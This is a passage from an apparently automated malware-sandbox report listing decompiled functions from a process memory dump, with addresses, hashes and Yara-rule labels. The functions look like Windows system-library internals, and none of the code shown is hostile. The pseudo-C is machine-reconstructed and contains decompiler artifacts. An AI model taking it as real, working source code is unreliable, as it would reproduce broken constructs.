				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x349d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E033C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x03478f6a
                                          0x03478f79
                                          0x03478f81
                                          0x03478f84
                                          0x03478f8b
                                          0x03478f91
                                          0x03478f94
                                          0x03478f9e
                                          0x03478fb0
                                          0x03478fa0
                                          0x03478fa9
                                          0x03478fa9
                                          0x03478fbb
                                          0x03478fbc
                                          0x03478fbe
                                          0x03478fc3
                                          0x03478fd6

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a080e5aa91a00082fb284456337f86da90703a09a37263a7eaab79caf7bc2a7c
                                          • Instruction ID: a8b7faad4fd8718c034e8e2d64b29b5c8e71c42a9f60d91614788595976daad0
                                          • Opcode Fuzzy Hash: a080e5aa91a00082fb284456337f86da90703a09a37263a7eaab79caf7bc2a7c
                                          • Instruction Fuzzy Hash: F3013C74E00208AFCB00EFB8D546AAEBBF4EF48300F50405AB905EF380EA34DA00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0346131B, Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E0346131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x349d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E033C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x0346131b
                                          0x0346132a
                                          0x03461330
                                          0x03461336
                                          0x0346133e
                                          0x03461341
                                          0x03461344
                                          0x0346134f
                                          0x03461361
                                          0x03461351
                                          0x0346135a
                                          0x0346135a
                                          0x0346136c
                                          0x0346136d
                                          0x0346136f
                                          0x03461374
                                          0x03461387

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c5bf8b09de6d1a9c4f0e437e5574b8d9823137b150138bfd33d7bc558ffac389
                                          • Instruction ID: b5d7e84f429d45e495d7eb676418f9b796723624fb94c5b1837e94e207c04758
                                          • Opcode Fuzzy Hash: c5bf8b09de6d1a9c4f0e437e5574b8d9823137b150138bfd33d7bc558ffac389
                                          • Instruction Fuzzy Hash: A1013CB5E01258AFCB04EFA9D545AAEB7F4FF48700F40405AB805EF381E6349A40CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03461608, Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E03461608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x349d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E033C7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                          0x03461608
                                          0x03461617
                                          0x0346161d
                                          0x03461625
                                          0x03461628
                                          0x0346162b
                                          0x03461636
                                          0x03461648
                                          0x03461638
                                          0x03461641
                                          0x03461641
                                          0x03461653
                                          0x03461654
                                          0x03461656
                                          0x0346165b
                                          0x0346166e

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0903d20efa78ce998b994c7c18b82b92c439e2c162d46e1f0fceec9b5dfd8288
                                          • Instruction ID: 71c96c2b449e7667a00624766ddc62b294ab383f507ab6abf6c6fe8b7900dcd3
                                          • Opcode Fuzzy Hash: 0903d20efa78ce998b994c7c18b82b92c439e2c162d46e1f0fceec9b5dfd8288
                                          • Instruction Fuzzy Hash: 36F06275E04358EFCB14EFA8D545A6EB7F4EF18300F44405AA915EF391E6349900CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033CC577, Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E033CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x33811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E034788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                          0x033cc577
                                          0x033cc57d
                                          0x033cc581
                                          0x033cc5b5
                                          0x033cc5b9
                                          0x033cc5ce
                                          0x033cc5ce
                                          0x033cc5ca
                                          0x00000000
                                          0x033cc5ca
                                          0x033cc5c4
                                          0x033cc5c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033cc5ad
                                          0x00000000
                                          0x033cc5af

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f24f5b41baced994fee81ca231b099d2f273f52d9bffc78fadab8309f79d52e
                                          • Instruction ID: 9894f9a5de875bbe1b96d2e20081b69f99a294e2185b95882410ab32f251fcc7
                                          • Opcode Fuzzy Hash: 9f24f5b41baced994fee81ca231b099d2f273f52d9bffc78fadab8309f79d52e
                                          • Instruction Fuzzy Hash: 57F0F0B29313D08ED731C31688D4B21BBD89B08270F5864AFD40D87507CAA0CC82C340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E927A, Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E033E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E033EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E033E92C6(_t11, _t14);
				}
				return _t11;
			}





                                          0x033e9295
                                          0x033e9299
                                          0x033e929f
                                          0x033e92aa
                                          0x033e92ad
                                          0x033e92ae
                                          0x033e92af
                                          0x033e92b0
                                          0x033e92b4
                                          0x033e92bb
                                          0x033e92bb
                                          0x033e92c5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: 8acafad4e0e8325e34f36b35332f4e574538365e47c607ff1e43a409891773dc
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: 09E0ED326406406BEB21DE0ACCC0B0376A9AF82B20F054078B9001E282CAFADC0887A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03478D34, Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E03478D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x349d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E033C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                          0x03478d34
                                          0x03478d43
                                          0x03478d4b
                                          0x03478d4e
                                          0x03478d52
                                          0x03478d5c
                                          0x03478d6e
                                          0x03478d5e
                                          0x03478d67
                                          0x03478d67
                                          0x03478d79
                                          0x03478d7a
                                          0x03478d7c
                                          0x03478d81
                                          0x03478d94

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 546bd02d6402ff0c5eac9ca45079ec605e83fa323fdad739007f2f279f1e9713
                                          • Instruction ID: dbb9e5034d67fda17e97ba64662fed7d7628ba257cd131cc6bc3a98cc7b9e20d
                                          • Opcode Fuzzy Hash: 546bd02d6402ff0c5eac9ca45079ec605e83fa323fdad739007f2f279f1e9713
                                          • Instruction Fuzzy Hash: A5F09074E04708AFCB14EBA8D546AAEB7B4AF18300F50809AE905AF280DA34D9008B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03462073, Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E03462073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0345FD22(__ecx);
				_t19 =  *0x349849c - _t3; // 0x7e69a8df
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3498748; // 0x0
					if(__eflags <= 0) {
						E03461C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3498724 & 0x00000004;
							if(( *0x3498724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3498724; // 0x0
					return E03458DF1(__ebx, 0xc0000374, 0x3495890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                          0x03462076
                                          0x03462078
                                          0x0346207d
                                          0x03462083
                                          0x034620a4
                                          0x034620aa
                                          0x034620ac
                                          0x034620b7
                                          0x034620ba
                                          0x034620bc
                                          0x034620c9
                                          0x034620c9
                                          0x034620d0
                                          0x034620d2
                                          0x00000000
                                          0x034620d2
                                          0x034620be
                                          0x034620c3
                                          0x034620c5
                                          0x034620c7
                                          0x00000000
                                          0x00000000
                                          0x034620c7
                                          0x034620bc
                                          0x034620d4
                                          0x03462085
                                          0x03462085
                                          0x034620a3
                                          0x034620a3

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef0f5062b5ea854cdc1583418cac0b1f560b23db5c988922959e400192376377
                                          • Instruction ID: c9765a5c4e6bea61f4124525f07f3adfdc3f2334bc57cf758af8e4149cff0556
                                          • Opcode Fuzzy Hash: ef0f5062b5ea854cdc1583418cac0b1f560b23db5c988922959e400192376377
                                          • Instruction Fuzzy Hash: E6F0272A811A945ADE32FF2928012D23BC5C75A110B0D0CC7D9502F309C9758883CB1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A4F2E, Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E034788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E033CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3381030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                          0x033a4f2e
                                          0x033a4f34
                                          0x033a4f38
                                          0x03400b85
                                          0x03400b85
                                          0x03400b89
                                          0x03400b9a
                                          0x03400b9a
                                          0x03400b9f
                                          0x00000000
                                          0x03400b9f
                                          0x03400b94
                                          0x03400b98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03400b98
                                          0x033a4f3e
                                          0x033a4f48
                                          0x00000000
                                          0x033a4f6e
                                          0x00000000
                                          0x033a4f70

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d174d2ed55f96b5be889d85511e5c6623c6617e49f0e94e07a36cb6488325e5
                                          • Instruction ID: 2b45393abc96181462cf19eb460feb993f1bc8961c4dff1c4fcbdefa63effb77
                                          • Opcode Fuzzy Hash: 9d174d2ed55f96b5be889d85511e5c6623c6617e49f0e94e07a36cb6488325e5
                                          • Instruction Fuzzy Hash: 76F0BE36A21B848FD770D799C284B23B7E8AB0067CF0955B6D8058FBA2C734EC40C748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03478B58, Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E03478B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x349d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E033C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x03478b67
                                          0x03478b6f
                                          0x03478b72
                                          0x03478b7d
                                          0x03478b8f
                                          0x03478b7f
                                          0x03478b88
                                          0x03478b88
                                          0x03478b9a
                                          0x03478b9b
                                          0x03478b9d
                                          0x03478ba2
                                          0x03478bb5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7beb3c541270016e2e6d3af03421c9c420d5d81692b238350c1cd139731d8699
                                          • Instruction ID: 766127d55251c582ea53ab141f438d156e6a6d3f5b9736e5e37614dd4ab2e926
                                          • Opcode Fuzzy Hash: 7beb3c541270016e2e6d3af03421c9c420d5d81692b238350c1cd139731d8699
                                          • Instruction Fuzzy Hash: 5EF082B4E14258AFDB10EBA8D94AE6EB3B4EF04300F440459B915EF3C1EA34D900C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033C746D, Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E033C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E033BEB70(__ecx, 0x34979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E033E95D0();
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                          0x033c746d
                                          0x033c746d
                                          0x033c746d
                                          0x033c7471
                                          0x033c7488
                                          0x0340f92d
                                          0x033c748e
                                          0x033c7491
                                          0x033c7495
                                          0x0340f937
                                          0x0340f93a
                                          0x0340f94e
                                          0x0340f953
                                          0x0340f956
                                          0x0340f956
                                          0x033c7495
                                          0x00000000
                                          0x033c7488
                                          0x033c7473
                                          0x033c7478
                                          0x033c747d
                                          0x033c7481
                                          0x00000000
                                          0x033c7481
                                          0x033c747d
                                          0x033c747a
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19ed4cc5149688b4b69dda51facfc86dedd14671cbc6e04d2af954c3f5c13660
                                          • Instruction ID: 0396c5aa9882646865fbe0143d1d14f83d722efd906b35b7b7c852b33f017500
                                          • Opcode Fuzzy Hash: 19ed4cc5149688b4b69dda51facfc86dedd14671cbc6e04d2af954c3f5c13660
                                          • Instruction Fuzzy Hash: 02F09634924284AEDF11D768C8C0BF9BB65AF04210F04016ADCE19B590E7249C81CF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03478CD6, Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E03478CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x349d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E033C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x03478ce5
                                          0x03478ced
                                          0x03478cf0
                                          0x03478cfb
                                          0x03478d0d
                                          0x03478cfd
                                          0x03478d06
                                          0x03478d06
                                          0x03478d18
                                          0x03478d19
                                          0x03478d1b
                                          0x03478d20
                                          0x03478d33

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 390d126264cbff7f759b2dcae46280f56829ad6d9f0273785b46f54672bd041e
                                          • Instruction ID: 135243bc510813330309428b8bc1efb8de651632028720a4bb540f0e3cf9869a
                                          • Opcode Fuzzy Hash: 390d126264cbff7f759b2dcae46280f56829ad6d9f0273785b46f54672bd041e
                                          • Instruction Fuzzy Hash: B6F08975D04258AFCB04EBA8D95AEAE77B4EF19200F54015AE915EF3C0EA34DD00C754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DA44B, Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3497b9c; // 0x0
				_t15 = __ecx;
				_t16 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E033EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                          0x033da44b
                                          0x033da453
                                          0x033da472
                                          0x033da476
                                          0x00000000
                                          0x033da493
                                          0x033da47a
                                          0x033da47f
                                          0x033da486
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c0a1932d2852a2aa64082421b8965fc24089100100f956ffcb78cd93b74193
                                          • Instruction ID: dfbeea19b2fafd6d68b3cbad13798c0a7485fe4dd9f864641ab84a87bbb9b100
                                          • Opcode Fuzzy Hash: 07c0a1932d2852a2aa64082421b8965fc24089100100f956ffcb78cd93b74193
                                          • Instruction Fuzzy Hash: 2AE092B3A15421ABD2229B18FC40F66B3ADDBE4A55F0A4039E504DB254D668DD51C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AF358, Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E033AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E033DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L033C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                          0x033af35d
                                          0x033af361
                                          0x033af367
                                          0x033af372
                                          0x033af38c
                                          0x033af38c
                                          0x033af394

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: e4baf16792c84a45479a879d194fd7a8ea922be0cdf7ac74ed72d3aa8d148aa1
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: F4E0DF32A41218BBCB31EADD9E45FAAFBBCDF48A60F050195B904DB190D564AE00C2D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033BFF60, Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x33811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E034788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E033C0050(_t14);
				}
			}










                                          0x033bff66
                                          0x033bff6b
                                          0x00000000
                                          0x033bff8f
                                          0x00000000
                                          0x033bff8f

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2dc9d727435da69675fd05e25031eefa376df88e89847860d3b506bb6991ab54
                                          • Instruction ID: e10d6548fc3cf0babcbe82bd4719a0b16b07914bd8779ef038e4998055d71191
                                          • Opcode Fuzzy Hash: 2dc9d727435da69675fd05e25031eefa376df88e89847860d3b506bb6991ab54
                                          • Instruction Fuzzy Hash: 5AE0DFB4A05344DFD734EB52DCC0FA577BCDB42721F1EE29EE1084B901C621D881C20A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0345D380, Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0345D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L033AE8B0(__ecx, _a4, 0xfff);
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                          0x0345d38a
                                          0x0345d39b
                                          0x0345d3b1
                                          0x00000000
                                          0x0345d3b6
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: 2dcb6344334b9af3aefcf80937586155c26ba1709b14ad5dafad8d1176f10b97
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: 95E0C235A80748BBEB229E44CC00F797B1ADF50BA1F104032FE085EB91C6719C92DAC8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034341E8, Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E034341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x34808f0);
				_t5 = E033FD08C(__ebx, __edi, __esi);
				if( *0x34987ec == 0) {
					E033BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x34987ec == 0) {
						 *0x34987f0 = 0x34987ec;
						 *0x34987ec = 0x34987ec;
						 *0x34987e8 = 0x34987e4;
						 *0x34987e4 = 0x34987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03434248();
				}
				return E033FD0D1(_t5);
			}





                                          0x034341e8
                                          0x034341ea
                                          0x034341ef
                                          0x034341fb
                                          0x03434206
                                          0x0343420b
                                          0x03434216
                                          0x0343421d
                                          0x03434222
                                          0x0343422c
                                          0x03434231
                                          0x03434231
                                          0x03434236
                                          0x0343423d
                                          0x0343423d
                                          0x03434247

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a3be630e72e9639d215d1f614ebb8fd67d94d9598b781255fd48afa8805a298
                                          • Instruction ID: 28921d6fca1c54acb720fd3713a125ba862e3e384380d3347ba6418b566943ff
                                          • Opcode Fuzzy Hash: 2a3be630e72e9639d215d1f614ebb8fd67d94d9598b781255fd48afa8805a298
                                          • Instruction Fuzzy Hash: 28F0F2788607249FDBA0EBAEAD08748B6E4E75A350F50419B8104AF3AAC7344484CF09
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DA185, Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033DA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x34967e4 >= 0xa) {
					if(_t5 < 0x3496800 || _t5 >= 0x3496900) {
						return L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
